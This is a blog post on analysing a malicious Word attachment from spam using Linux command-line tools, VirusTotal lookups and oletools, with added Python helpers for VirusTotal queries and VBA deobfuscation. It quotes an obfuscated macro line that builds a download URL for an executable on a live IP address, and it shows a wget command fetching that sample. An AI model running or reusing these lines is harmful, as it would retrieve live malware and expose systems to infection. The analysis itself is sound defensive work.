Thursday, January 29, 2015

Malware Analysis from Linux CLI

Analyze SPAM malware from Linux CLI

A good source of malware samples is mail spam. In this case I used a Gmail account, but it is better to use custom domains and spread the mail addresses by publishing them on the web, social networks, … so harvesters can find them.

Let’s check the mail with mutt and go to the Spam folder.

Sadly there is always something new in this folder; this time it is an American Airlines mail.

We need to check the links and attachments.

The link seems to be legitimate; you can check it with whois aa.com and with the VirusTotal API. I use VT.py, but there are a lot of great scripts on this page: https://www.virustotal.com/en/documentation/public-api/.

itsuugo@linux01:~$  vt -d aa.com -adi -wdi
Status : Domain found in dataset

[+] Alexa domain info
        aa.com is one of the top 10,000 sites in the world and is in the A category

[+] WOT domain info
+---------------------------+----------------------+
|           Name            |        Value         |
+===========================+======================+
|    Vendor reliability     |      Excellent       |
+---------------------------+----------------------+
|       Child safety        |      Excellent       |
+---------------------------+----------------------+
|      Trustworthiness      |      Excellent       |
+---------------------------+----------------------+
|          Privacy          |      Excellent       |
+---------------------------+----------------------+

[+] Passive DNS replication
+---------------------------+----------------------+
|       last_resolved       |      ip_address      |
+===========================+======================+
|    2015-01-03 00:00:00    |     23.45.40.14      |
+---------------------------+----------------------+

Let’s look at the attachment. We are going to save it to a local folder and send it to VirusTotal:

itsuugo@linux01:~/malware$ vt -f 20152701-7203849_ticket.doc
Nothing found

        Results for MD5    : a0ba10cb6c9ceb3a79391552e570a129
        Results for SHA1   : 470e171a276b23207d3ab0fc1beca494e1810834
        Results for SHA256 : 698870d9bf61bca2ac972ee1c5b7e65aa522a4379cd7deee6732470ab5f7529a

        Status         : Scan request successfully queued, come back later for the report
        Permanent link : https://www.virustotal.com/file/698870d9bf61bca2ac972ee1c5b7e65aa522a4379cd7deee6732470ab5f7529a/analysis/1422529600/


itsuugo@linux01:~/malware$ vt -f 470e171a276b23207d3ab0fc1beca494e1810834

Looking for:
        470e171a276b23207d3ab0fc1beca494e1810834

Scanned on :
        2015-01-29 10:09:47

Detections:
         13/56 Positives/Total

+----------------+---------------------------------+--------------+-------------+
|  Vendor name   |             Result              |   Version    | Last Update |
+================+=================================+==============+=============+
|         Sophos | Troj/DocDl-EI                   | 4.98.0       |  20150129   |
+----------------+---------------------------------+--------------+-------------+
|      Kaspersky | Trojan-Downloader.VBS.Agent.akg | 15.0.1.10    |  20150129   |
+----------------+---------------------------------+--------------+-------------+
|     TrendMicro | W97M_DLOAD.VVPZ                 | 9.740.0.1012 |  20150129   |
+----------------+---------------------------------+--------------+-------------+

        Results for MD5    : a0ba10cb6c9ceb3a79391552e570a129
        Results for SHA1   : 470e171a276b23207d3ab0fc1beca494e1810834
        Results for SHA256 : 698870d9bf61bca2ac972ee1c5b7e65aa522a4379cd7deee6732470ab5f7529a

        Permanent Link : https://www.virustotal.com/file/698870d9bf61bca2ac972ee1c5b7e65aa522a4379cd7deee6732470ab5f7529a/analysis/1422526187/
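The lookups above can be scripted directly against the VirusTotal public API v2 that VT.py wraps. The following is an added example, not VT.py's own code: it hashes a sample, builds the file/report request, and reduces the JSON reply to a triage verdict. The reply embedded at the bottom is a constructed, abridged stand-in for a real response, and any API key value is a placeholder.

```python
import hashlib
import json
import urllib.parse
import urllib.request

VT_API = "https://www.virustotal.com/vtapi/v2/"  # public API v2, as used by VT.py-style scripts

def file_hashes(data):
    """MD5/SHA1/SHA256 of a sample, as vt -f prints them; any of them works as 'resource'."""
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}

def report_request(apikey, resource):
    """GET URL for the v2 file/report endpoint: a hash lookup, so the sample never leaves the host."""
    return VT_API + "file/report?" + urllib.parse.urlencode({"apikey": apikey, "resource": resource})

def fetch_report(apikey, resource):
    """Network call; the constructed reply below lets summarize() be exercised offline."""
    with urllib.request.urlopen(report_request(apikey, resource), timeout=30) as resp:
        return json.loads(resp.read().decode("utf-8"))

def summarize(report, min_positives=1):
    """Reduce a v2 file/report document to a triage verdict plus the names vendors assigned."""
    code = report.get("response_code")
    if code != 1:  # 0: hash not in dataset, -2: scan still queued (the 'come back later' case)
        return {"verdict": "queued" if code == -2 else "unknown", "message": report.get("verbose_msg", "")}
    hits = sorted((v, s["result"]) for v, s in report["scans"].items() if s.get("detected"))
    positives, total = report["positives"], report["total"]
    # 0 positives means 'nobody has detected it yet', not 'clean'; keep that distinction visible
    verdict = "malicious" if positives >= min_positives else "undetected"
    return {"verdict": verdict, "ratio": "%d/%d" % (positives, total), "scan_date": report["scan_date"],
            "detections": hits, "permalink": report["permalink"]}

# Constructed, abridged reply modelled on the vt -f output for the .doc above (not a real API reply).
SAMPLE_REPORT = {
    "response_code": 1, "scan_date": "2015-01-29 10:09:47", "positives": 3, "total": 4,
    "resource": "470e171a276b23207d3ab0fc1beca494e1810834",
    "permalink": "https://www.virustotal.com/file/698870d9bf61bca2ac972ee1c5b7e65aa522a4379cd7deee6732470ab5f7529a/analysis/1422526187/",
    "scans": {
        "Sophos": {"detected": True, "result": "Troj/DocDl-EI", "version": "4.98.0", "update": "20150129"},
        "Kaspersky": {"detected": True, "result": "Trojan-Downloader.VBS.Agent.akg", "version": "15.0.1.10", "update": "20150129"},
        "TrendMicro": {"detected": True, "result": "W97M_DLOAD.VVPZ", "version": "9.740.0.1012", "update": "20150129"},
        "ExampleAV": {"detected": False, "result": None, "version": "1.0", "update": "20150129"},
    },
}
QUEUED_REPORT = {"response_code": -2, "verbose_msg": "Scan request successfully queued, come back later for the report"}
```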

OK, we know that something evil is inside, so we are going to use oletools to investigate. You can find the output report in this paste: http://pastebin.com/LtPFWURZ.

The report is meaningful: as it says, the script runs when the Word document is opened. The code is obfuscated, but we can see that it gathers information from the computer and then downloads an exe file.

  Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://146.185.213.103/upd/install" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
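As an added example (not part of the original post or of oletools), a small evaluator for this kind of VBA string building: it tokenizes the Print argument quoted above, evaluates the Chr/Asc wrappers and the concatenations, and returns the string the macro assembles. The OBFUSCATED constant is copied from the line above; the parser is my own code.

```python
import re

# Constructed sample: the obfuscated Print argument quoted above (Chr(34) is a double quote).
OBFUSCATED = ('"strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + '
              '"://146.185.213.103/upd/install" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)')

# Token kinds: "literal" ("" escapes a quote), integer, Chr/Asc, one of ( ) + &, anything else is an error
_TOKEN = re.compile(r'\s*(?:"((?:[^"]|"")*)"|(\d+)|(Chr|Asc)|([()+&])|(\S))', re.I)

def tokenize(src):
    """Split a VBA string expression into (kind, value) pairs."""
    toks = []
    for m in _TOKEN.finditer(src):
        lit, num, fn, op, bad = m.groups()
        if bad:
            raise ValueError("unexpected %r in expression" % bad)
        if lit is not None:
            toks.append(("str", lit.replace('""', '"')))
        else:
            toks.append(("num", int(num)) if num else ("fn", fn.lower()) if fn else ("op", op))
    return toks

def _parse_expr(toks, i):
    """expr := term (('+' | '&') term)*; both operators concatenate strings in VBA."""
    val, i = _parse_term(toks, i)
    while i < len(toks) and toks[i] in (("op", "+"), ("op", "&")):
        rhs, i = _parse_term(toks, i + 1)
        val = val + rhs  # str + str concatenates, int + int adds, mixed types raise TypeError
    return val, i

def _parse_term(toks, i):
    """term := literal | Chr(expr) | Asc(expr); Chr(Asc(x)) is an identity wrapper around x."""
    kind, value = toks[i]
    if kind in ("str", "num"):
        return value, i + 1
    if kind == "fn" and i + 1 < len(toks) and toks[i + 1] == ("op", "("):
        arg, i = _parse_expr(toks, i + 2)
        if i >= len(toks) or toks[i] != ("op", ")"):
            raise ValueError("missing ')' after %s(" % value)
        return (chr(arg) if value == "chr" else ord(arg[0])), i + 1
    raise ValueError("unexpected token %r" % ((kind, value),))

def deobfuscate(src):
    """Evaluate a VBA string-building expression and return the string it builds."""
    toks = tokenize(src)
    val, i = _parse_expr(toks, 0)
    if i != len(toks):
        raise ValueError("trailing tokens starting at %r" % (toks[i],))
    return val
```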

You can find an older version of this VBA malware in Google cache.

We can download a sample with wget using the same headers:

wget --header="User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25" http://146.185.213.103/upd/install.exe 

Connecting to 146.185.213.103:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 150016 (146K) [application/octet-stream]
Saving to: ‘install.exe’

100%[======================================>] 150,016     97.1KB/s   in 1.5s   

‘install.exe’ saved [150016/150016]

and send it to VirusTotal

itsuugo@linux01:~/malware$ vt -f install.exe 
Nothing found

        Results for MD5    : 0ae67b36cd78c74bb60d34cf1a65de04
        Results for SHA1   : 8823c6de3811fb7c084da3dbdce1a2ac4488f184
        Results for SHA256 : 1abfe66059db90e41ab278abf43cea737ac76acc8159bf7806e2d41e1467baad

        Status         : Scan request successfully queued, come back later for the report
        Permanent link : https://www.virustotal.com/file/1abfe66059db90e41ab278abf43cea737ac76acc8159bf7806e2d41e1467baad/analysis/1422532187/


itsuugo@linux01:~/malware$ vt -f 8823c6de3811fb7c084da3dbdce1a2ac4488f184

Looking for:
        8823c6de3811fb7c084da3dbdce1a2ac4488f184

Scanned on : 
        2015-01-29 11:49:47

Detections:
         0/57 Positives/Total

It’s odd that a spam attachment carries undetected malware. Fortunately we can use VirusTotal to investigate further by checking the URL:

itsuugo@linux01:~/malware$ vt -ur  http://146.185.213.103/upd/install.exe 

Searching for url(s) report: 
        http://146.185.213.103/upd/install.exe

Scanned on : 
        2015-01-29 04:06:05

Detections:
         3/61 Positives/Total

Scanned url :
         http://146.185.213.103/upd/install.exe

        Permanent Link : https://www.virustotal.com/url/285daff50d5cf0ccbd8043940832116a7ba6912a8380335861f8c7178e6e2207/analysis/1422504365/

We need to abandon the CLI and open those links in a browser, where we can see that the file has changed:

    VirusTotal

SHA256: beb7f21e733149a0da6e25fec245829eeb7e45348f29be15336f18f2afe1a137
File name:  winlogin.exe
Detection ratio:    3 / 57
Analysis date:  2015-01-28 21:04:35 UTC ( 17 hours, 40 minutes ago )

But it seems the server is used for spreading more of these things, so I think it’s safe to blacklist this IP.

itsuugo@linux01:~/malware$  vt -v -i 146.185.213.103

[+] Status 146.185.213.103: IP address found in dataset

[+] Latest detected files that were downloaded from this domain/ip

+-----------------+------------+----------------------+------------------------------------------------------------------------+
|    positives    |   total    |         date         |                                 sha256                                 |
+=================+============+======================+========================================================================+
|        5        |     57     | 2015-01-29 04:03:22  |    6efc7fb3010cf9606b7498f91810ec925fedd9ee192792299839aa657325dd4f    |
+-----------------+------------+----------------------+------------------------------------------------------------------------+

[+] Latest undetected files that were downloaded from this domain/ip

+-----------------+------------+----------------------+------------------------------------------------------------------------+
|    positives    |   total    |         date         |                                 sha256                                 |
+=================+============+======================+========================================================================+
|        --       |     57     | 2015-01-29 13:47:50  |    075865abff746c42f2b0afdfc190edc662876127ee41e91d9da83464e6b5ba7c    |
+-----------------+------------+----------------------+------------------------------------------------------------------------+

[+] Latest detected URLs

+-----------+-------+----------------------+-----------------------------------------+
| positives | total |      scan_date       |                   url                   |
+===========+=======+======================+=========================================+
|     2     |  61   | 2015-01-29 13:47:46  | http://146.185.213.103/upd/install      |
+-----------+-------+----------------------+-----------------------------------------+
|     2     |  61   | 2015-01-29 06:25:53  | http://146.185.213.103/                 |
+-----------+-------+----------------------+-----------------------------------------+
|     5     |  61   | 2015-01-29 04:03:18  | http://146.185.213.103/upd2/install.exe |
+-----------+-------+----------------------+-----------------------------------------+